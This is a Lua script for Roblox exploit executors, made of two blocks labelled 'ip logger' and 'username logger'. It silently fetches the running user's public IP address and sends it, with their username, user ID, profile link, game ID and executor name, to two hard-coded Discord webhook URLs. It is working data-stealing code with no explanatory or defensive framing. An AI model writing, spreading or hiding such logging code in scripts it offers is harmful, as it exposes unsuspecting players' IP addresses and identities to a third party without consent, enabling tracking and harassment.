--// ip logger
local IP = tostring(game:HttpGet("https://api.ipify.org", true))

local webhookcheck =
    is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
    secure_load and "Sentinel" or
    KRNL_LOADED and "Krnl" or
    SONA_LOADED and "Sona" or
    "Kid with shit exploit"

local url =
    "https://discord.com/api/webhooks/911498447025238016/Bg2QnzQsLxOzhPrGJmMmeoZ0PeQE49SMoosWCQsqq7AMdXMmX__Fs1ERW7Y2eRRV83Gx"
local data = {
    ["content"] = "",
    ["embeds"] = {
        {
            ["title"] = "Script Executed Successfully",
            ["color"] = 3340800,
            ["fields"] = {
                {
                    ["name"] = "PlayerName",
                    ["value"] = game.Players.LocalPlayer.Name
                },
                {
                    ["name"] = "GamePlaceID",
                    ["value"] = game.PlaceId
                },
                {
                    ["name"] = "Exploit",
                    ["value"] = webhookcheck
                },
                {
                    ["name"] = "Profile Link",
                    ["value"] = "https://www.roblox.com/users/" ..
                        game:GetService("Players").LocalPlayer.UserId .. "/profile"
                },
                {
                    ["name"] = "IP",
                    ["value"] = IP
                }
            },
            ["footer"] = {
                ["text"] = "By 55 HoodReligions#0001"
            }
        }
    }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
    ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
--// ip logger

--//username logger
local webhookcheck =
    is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
    secure_load and "Sentinel" or
    KRNL_LOADED and "Krnl" or
    SONA_LOADED and "Sona" or
    "Kid with shit exploit"

local url =
    "https://discord.com/api/webhooks/911497771129901097/iNIEiS1bFVTFRka0Hl-99Q5QrDaRt1ffsHajx3NyqrlG002vWyM3wevg3bVDFfhvcDEy"
local data = {
    ["content"] = "",
    ["embeds"] = {
        {
            ["title"] = "Script Executed Successfully",
            ["color"] = 3340800,
            ["fields"] = {
                {
                    ["name"] = "PlayerName",
                    ["value"] = game.Players.LocalPlayer.Name
                },
                {
                    ["name"] = "GamePlaceID",
                    ["value"] = game.PlaceId
                },
                {
                    ["name"] = "Exploit",
                    ["value"] = webhookcheck
                },
                {
                    ["name"] = "Profile Link",
                    ["value"] = "https://www.roblox.com/users/" ..
                        game:GetService("Players").LocalPlayer.UserId .. "/profile"
                }
            },
            ["footer"] = {
                ["text"] = "By 55 HoodReligions#0001"
            }
        }
    }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
    ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
--//username logger
